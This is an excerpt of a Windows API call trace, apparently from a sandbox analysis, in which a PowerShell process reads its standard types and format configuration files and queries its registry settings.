	[0734.497] ReadFile (in: hFile=0x314, lpBuffer=0x2ca2e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ca2e28*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0734.497] ReadFile (in: hFile=0x314, lpBuffer=0x2ca2e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ca2e28*, lpNumberOfBytesRead=0x16d6a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0734.497] ReadFile (in: hFile=0x314, lpBuffer=0x2ca2283, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ca2283*, lpNumberOfBytesRead=0x16d6a8*=0x0, lpOverlapped=0x0) returned 1
	[0734.497] ReadFile (in: hFile=0x314, lpBuffer=0x2ca2e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ca2e28*, lpNumberOfBytesRead=0x16d6a8*=0x0, lpOverlapped=0x0) returned 1
	[0734.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.500] SetErrorMode (uMode=0x1) returned 0x1
	[0734.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d620 | out: lpFileInformation=0x16d620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0734.500] SetErrorMode (uMode=0x1) returned 0x1
	[0734.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.501] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d708 | out: phkResult=0x16d708*=0x314) returned 0x0
	[0734.501] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x1, lpData=0x0, lpcbData=0x16d688*=0x56) returned 0x0
	[0734.501] CoTaskMemAlloc (cb=0x5a) returned 0x2d3fd0
	[0734.501] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d65c, lpData=0x2d3fd0, lpcbData=0x16d658*=0x56 | out: lpType=0x16d65c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d658*=0x56) returned 0x0
	[0734.501] CoTaskMemFree (pv=0x2d3fd0) 
	[0734.501] RegCloseKey (hKey=0x314) returned 0x0
	[0734.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0736.065] VirtualQuery (in: lpAddress=0x16c3f0, lpBuffer=0x16d2b0, dwLength=0x30 | out: lpBuffer=0x16d2b0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0736.079] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0736.079] GetFileType (hFile=0x314) returned 0x1
	[0736.079] SetErrorMode (uMode=0x1) returned 0x1
	[0736.079] GetFileType (hFile=0x314) returned 0x1
	[0736.079] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.080] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.080] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.081] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.081] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.083] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.083] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.083] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.083] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.085] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.085] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.086] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.086] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.086] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.087] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.087] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.087] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.506] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.507] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.507] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.507] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.508] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.508] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.508] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.509] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.509] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.509] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.509] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.510] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.510] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.510] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.511] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.511] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.516] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.516] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.516] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.517] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.517] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.517] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.517] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.518] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.518] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0737.518] ReadFile (in: hFile=0x314, lpBuffer=0x2d09fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09fe8*, lpNumberOfBytesRead=0x16d6a8*=0x0, lpOverlapped=0x0) returned 1
	[0737.518] CloseHandle (hObject=0x314) returned 1
	[0737.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0737.519] SetErrorMode (uMode=0x1) returned 0x1
	[0737.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d620 | out: lpFileInformation=0x16d620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0737.519] SetErrorMode (uMode=0x1) returned 0x1
	[0737.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0737.519] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d708 | out: phkResult=0x16d708*=0x314) returned 0x0
	[0737.519] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x1, lpData=0x0, lpcbData=0x16d688*=0x56) returned 0x0
	[0737.519] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0737.519] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d65c, lpData=0x1b3cb2e0, lpcbData=0x16d658*=0x56 | out: lpType=0x16d65c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d658*=0x56) returned 0x0
	[0737.519] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0737.519] RegCloseKey (hKey=0x314) returned 0x0
	[0737.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0737.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0748.782] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0748.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.783] CoTaskMemFree (pv=0x2b2120) 
	[0750.106] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d8a8 | out: phkResult=0x16d8a8*=0x2dc) returned 0x0
	[0750.106] RegQueryValueExW (in: hKey=0x2dc, lpValueName="path", lpReserved=0x0, lpType=0x16d8bc, lpData=0x0, lpcbData=0x16d8b8*=0x0 | out: lpType=0x16d8bc*=0x1, lpData=0x0, lpcbData=0x16d8b8*=0x74) returned 0x0
	[0750.106] RegQueryValueExW (in: hKey=0x2dc, lpValueName="path", lpReserved=0x0, lpType=0x16d82c, lpData=0x0, lpcbData=0x16d828*=0x0 | out: lpType=0x16d82c*=0x1, lpData=0x0, lpcbData=0x16d828*=0x74) returned 0x0
	[0750.106] CoTaskMemAlloc (cb=0x78) returned 0x2607c0
	[0750.106] RegQueryValueExW (in: hKey=0x2dc, lpValueName="path", lpReserved=0x0, lpType=0x16d7fc, lpData=0x2607c0, lpcbData=0x16d7f8*=0x74 | out: lpType=0x16d7fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d7f8*=0x74) returned 0x0
	[0750.106] CoTaskMemFree (pv=0x2607c0) 
	[0750.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0750.107] SetErrorMode (uMode=0x1) returned 0x1
	[0750.107] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d780 | out: lpFileInformation=0x16d780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0750.107] SetErrorMode (uMode=0x1) returned 0x1
	[0750.108] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0750.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.108] CoTaskMemFree (pv=0x2b2120) 
	[0750.110] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0750.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.111] CoTaskMemFree (pv=0x2b2120) 
	[0750.112] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0750.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.112] CoTaskMemFree (pv=0x2b2120) 
	[0750.113] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0750.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.114] CoTaskMemFree (pv=0x2b2120) 
	[0750.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0750.115] SetErrorMode (uMode=0x1) returned 0x1
	[0750.115] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0750.115] GetFileType (hFile=0x310) returned 0x1
	[0750.115] SetErrorMode (uMode=0x1) returned 0x1
	[0750.115] GetFileType (hFile=0x310) returned 0x1
	[0751.440] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.441] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.441] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.441] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.442] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.443] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0751.443] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x9e2, lpOverlapped=0x0) returned 1
	[0751.443] ReadFile (in: hFile=0x310, lpBuffer=0x33b0e7a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b0e7a*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0751.443] ReadFile (in: hFile=0x310, lpBuffer=0x33b1930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33b1930*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0751.443] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x310) returned 0x0
